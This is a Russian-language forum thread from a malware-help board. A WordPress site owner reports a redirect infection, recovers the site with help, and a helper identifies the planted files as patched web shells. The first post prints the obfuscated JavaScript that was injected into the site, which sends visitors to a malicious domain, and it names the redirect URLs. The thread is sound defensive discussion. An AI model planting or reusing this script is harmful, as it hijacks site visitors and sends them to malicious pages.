# Форум на русском языке  > Лечение и защита сайтов от вирусов  >  Редирект при открытии сайта Вирус?

## Redje

Сайт на WP.
При попытке открыть сайт, происходит редирект сначала на


```
https://trick.trainresistor.cc/come.php?id=76967-55-43567896-4
```

потом на


```
https://fingerprintopuch.best/go/gzstiodbga5dkobsgy?subid3=plerk&=8&subid4=coffein
```

и вываливается кусок кода


```
	window.stop(); function _0x4165(_0x1c7833,_0x312763){var _0x384719=_0x3847();return _0x4165=function(_0x4165ff,_0x4cb21c){_0x4165ff=_0x4165ff-0x185;var _0x3edf04=_0x384719[_0x4165ff];return _0x3edf04;},_0x4165(_0x1c7833,_0x312763);}var _0x2ca8a2=_0x4165;(function(_0x538cc7,_0x2ae31a){var _0x173fc3=_0x4165,_0x5b6817=_0x538cc7();while(!![]){try{var _0x1b9268=parseInt(_0x173fc3(0x18e))/0x1+parseInt(_0x173fc3(0x191))/0x2*(parseInt(_0x173fc3(0x18d))/0x3)+parseInt(_0x173fc3(0x18f))/0x4+-parseInt(_0x173fc3(0x189))/0x5*(-parseInt(_0x173fc3(0x18c))/0x6)+-parseInt(_0x173fc3(0x186))/0x7+-parseInt(_0x173fc3(0x187))/0x8*(parseInt(_0x173fc3(0x18a))/0x9)+parseInt(_0x173fc3(0x18b))/0xa;if(_0x1b9268===_0x2ae31a)break;else _0x5b6817['push'](_0x5b6817['shift']());}catch(_0x1fc706){_0x5b6817['push'](_0x5b6817['shift']());}}}(_0x3847,0xe77a1));var ll=_0x2ca8a2(0x190);document[_0x2ca8a2(0x188)][_0x2ca8a2(0x185)]=ll,window[_0x2ca8a2(0x188)][_0x2ca8a2(0x192)](ll);function _0x3847(){var _0x786271=['688400bYXEDO','replace','href','5956636QUrnAb','47696JxEbld','location','296330XygErO','2358VtSkab','19357140uMcgeD','18tMFlRH','3cAvVrX','231172tCDMyi','2688948VEEIEX',String.fromCharCode(104,116,116,112,115,58,47,47,116,114,105,99,107,46,116,114,97,105,110,114,101,115,105,115,116,111,114,46,99,99,47,97,46,112,104,112,63,115,105,100,61,49,49,49,49,49,49,38,117,116,109,95,115,111,117,114,99,101,61,55,53,52,56,52,53)];_0x3847=function(){return _0x786271;};return _0x3847();}
```

Чем может быть вызвано?
Вирус?

Провекрка Aibolit ничего не дала.
А вот Eset 32 ругается при открытии сайта

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Aleksandra

Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.

----------


## Redje

> Сделайте полный бэкап сайта вместе с БД и ссылку мне в личку.


Добрый день.
Уже решил вопрос.
Спасибо!

----------


## Aleksandra

Каким образом?

----------


## Redje

> Каким образом?


Установил примерную дату заражения. Посмотрел в какие файлы были внесены изменения с того момента. Установил ip злоумышленника, по логам посмотрел к каким файлам он обращался. 
К сожалению, бэкапа предшествовавшего моменту заражения уже не было, поэтому восстановил сайт из бэкапа на момент, когда сайт еще открывался, но был уже заражен.  
Закрыл доступ к сайту в htaccess. Удалил зараженные файлы. Удалил папки с шаблоном и плагинами  по которым была зафиксирована активность злоумышленника. 
Обновил сайт, заново установил шаблон и плагины, удалил учётные запись созданную злоумышленником, поменял пороли. Установил дополнительные плагины для повышения устойчивости сайта к взлому. В htaccess прописал директивы ограничивающие изменения в файлах только моим IP. Открыл доступ к сайту. 
Пока рецидивов - нет.

----------


## Aleksandra

> Удалил зараженные файлы.


Если у вас остались эти файлы, можете скинуть мне их в личку?

----------

Redje

----------


## Redje

> Если у вас остались эти файлы, можете скинуть мне их в личку?


Отправил ссылку в личку.
Если не затруднит поделитесь потом тем, что узнаете.
Чтобы хотя бы знать, что это и как называется )

----------


## Aleksandra

> Отправил ссылку в личку.
> Если не затруднит поделитесь потом тем, что узнаете.
> Чтобы хотя бы знать, что это и как называется )


Хорошо, спасибо.

----------


## Aleksandra

Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65...5a84a7c2bd9598

Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.

Детект с комментариями на VT:

https://www.virustotal.com/gui/file/...bfa58748ae6efb
https://www.virustotal.com/gui/file/...362cba7ef76c8f

----------

Redje

----------


## Redje

> Патченный https://github.com/prasathmani/tinyfilemanager/, а второй патченный https://gist.github.com/ilaraujo/e65...5a84a7c2bd9598
> 
> Один это полноценный файловый менеджер, другой в основном предназначен для манипуляции с аккаунтами WP.
> 
> Детект с комментариями на VT:
> 
> https://www.virustotal.com/gui/file/...bfa58748ae6efb
> https://www.virustotal.com/gui/file/...362cba7ef76c8f


Спасибо!
Весьма познавательно.

Хотелось бы еще уточнить, а код который вываливался после редиректа, который был внедрен на сайт, что из себя представляет. Он в первом посте.
Т.е. какова была цель злоумышленника?

----------

